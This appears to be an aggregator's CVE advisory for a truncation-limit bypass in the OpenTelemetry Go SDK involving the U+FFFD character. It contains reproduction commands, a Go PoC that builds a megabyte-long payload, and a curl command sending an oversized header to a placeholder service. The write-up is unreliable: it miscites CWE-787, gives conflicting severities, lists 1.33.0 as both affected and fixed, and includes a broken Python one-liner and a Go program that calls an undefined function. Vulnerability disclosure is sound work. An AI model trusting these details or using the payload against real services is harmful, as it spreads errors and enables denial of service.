Go SDK OpenTelemetry AttributeValueLengthLimit Bypass (CWE-176: Improper Handling of Unicode Encoding, CWE-400: Uncontrolled Resource Consumption), CVE-2026-81869 (Moderate) -DC-Sep2026-2626

Listen to this Post

The OpenTelemetry Go SDK trace package can fail to enforce AttributeValueLengthLimit for string attributes containing the valid Unicode replacement character U+FFFD. String and string-slice span attributes are truncated through `safeTruncate` when AttributeValueLengthLimit is non-negative, with the enforcement path identified in sdk/trace/span.go:303-331. The `safeTruncate` function first calls safeTruncateValidUTF8; if that returns ok=false, it calls `strings.ToValidUTF8(input, “”)` and retries. The core technical issue arises when span attributes contain string or string-slice values that include the valid Unicode replacement character U+FFFD. In standard UTF-8 encoding, this character serves as a placeholder for invalid sequences but is itself a perfectly valid rune. However, `safeTruncateValidUTF8` incorrectly classifies this specific valid rune as an invalid UTF-8 sequence. The function treats any `utf8.RuneError` from `utf8.DecodeRuneInString` as invalid UTF-8 and immediately returns the original input with ok=false. Go also returns `utf8.RuneError` for a valid encoded U+FFFD rune, as confirmed by the validation artifact output r=U+FFFD size=3 runeError=true. For an input such as `”AAAA” + U+FFFD + strings.Repeat(“B”, 20)` with a limit of 5, the first truncation attempt sees U+FFFD as `utf8.RuneError` and returns the full input with ok=false. `strings.ToValidUTF8` does not remove the valid U+FFFD rune, so the second attempt returns the same full input. As a result, the span attribute value remains 27 bytes long even though the configured limit is 5. An attacker who controls span attribute content can retain values longer than the configured limit, increasing per-span memory use and weakening denial-of-service protection in the instrumented process. This vulnerability aligns with CWE-787: Out-of-bounds Write and CWE-400: Uncontrolled Resource Consumption, and maps to MITRE ATT&CK technique T1496: Resource Hijacking. The flaw is introduced in commit 49a6536 from September 12, 2022, and affects versions from 1.10.0 until 1.33.0. The finding is low severity because it requires a deployment with attribute value length limits enabled and attacker-controlled data being recorded into span attributes.

DailyCVE Form:

Platform: OpenTelemetry-Go
Version: 1.10.0–1.33.0
Vulnerability : AttributeValueLengthLimit Bypass
Severity: Moderate
date: 2026-09-02

Prediction: Patched in 1.33.0

What Undercode Say:

Reproduction configuration
Repository: pellared/opentelemetry-go
Commit: 49a6536 from September 12, 2022
Package/module path: sdk/trace under the sdk module
Attribute value length limit used by the PoC: limit := 5
cd /path/to/opentelemetry-go
git checkout 49a6536
tar -xOf /path/to/validation-artifact.tar safe_truncate_bypass/safe_truncate_poc_test.go > sdk/trace/safe_truncate_poc_test.go
cd sdk
go test ./trace -run TestSafeTruncateBypass -count=1 -v
// safe_truncate_poc_test.go (excerpt)
input := "AAAA" + "\uFFFD" + strings.Repeat("B", 20)
limit := 5
got := safeTruncate(input, limit)
// Expected: got should be truncated to 5 bytes
// Actual: got_len == 27, bypass confirmed
Standalone UTF-8 behavior verification
tar -xOf /path/to/validation-artifact.tar safe_truncate_bypass/runecheck_output.txt
Output: r=U+FFFD size=3 runeError=true

Exploit: (Educational Purposes!)

// Educational PoC: Bypassing AttributeValueLengthLimit
// In a deployment where span attributes record attacker-controlled input
// (e.g., HTTP headers, query parameters, user identifiers)
package main
import (
"fmt"
"strings"
)
func main() {
// Simulated attacker-controlled attribute value
replacementChar := "\uFFFD" // valid Unicode replacement character
attackerPayload := "AAAA" + replacementChar + strings.Repeat("B", 1000000)
// Configured limit intended to bound memory
limit := 256
// The vulnerable safeTruncate returns the full oversized payload
result := safeTruncate(attackerPayload, limit)
fmt.Printf("Configured limit: %d bytes\n", limit)
fmt.Printf("Actual stored length: %d bytes\n", len(result))
// Output: Actual stored length: 1000004 bytes (bypassed)
}
Attacker-controlled data flows into span attributes
Example: HTTP request header recorded as span attribute
curl -H "X-User-Data: AAAA$(printf '\xEF\xBF\xBD')$(python3 -c 'print("B"1000000)')" \
http://target-service/api/endpoint
The oversized attribute bypasses truncation and increases per-span memory usage

Protection:

Upgrade to the patched version
go get go.opentelemetry.io/otel/[email protected]
Verify current version
go list -m go.opentelemetry.io/otel/sdk
// Post-patch behavior: safeTruncateValidUTF8 correctly handles U+FFFD
// The function now distinguishes between an actual invalid UTF-8 sequence
// and a valid encoded U+FFFD rune, ensuring truncation is enforced
Defensive configuration: reduce risk surface
1. Disable attribute value length limits only if not needed
2. Avoid recording untrusted input directly into span attributes
3. Apply input sanitization before passing data to tracing APIs
4. Monitor span attribute sizes for anomalies

Impact:

Applications that enable AttributeValueLengthLimit to bound memory usage can still store oversized attacker-controlled attribute values if those values contain U+FFFD. The practical impact is increased memory use and reduced denial-of-service protection in the instrumented process; the finding does not show confidentiality or integrity impact. In high-throughput environments where telemetry data is generated at scale, unbounded growth can lead to substantial resource exhaustion, effectively undermining the denial-of-service protections intended by the length limits. The failure to enforce size limits allows for uncontrolled memory allocation based on external input, which is a classic precursor to denial-of-service attacks.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top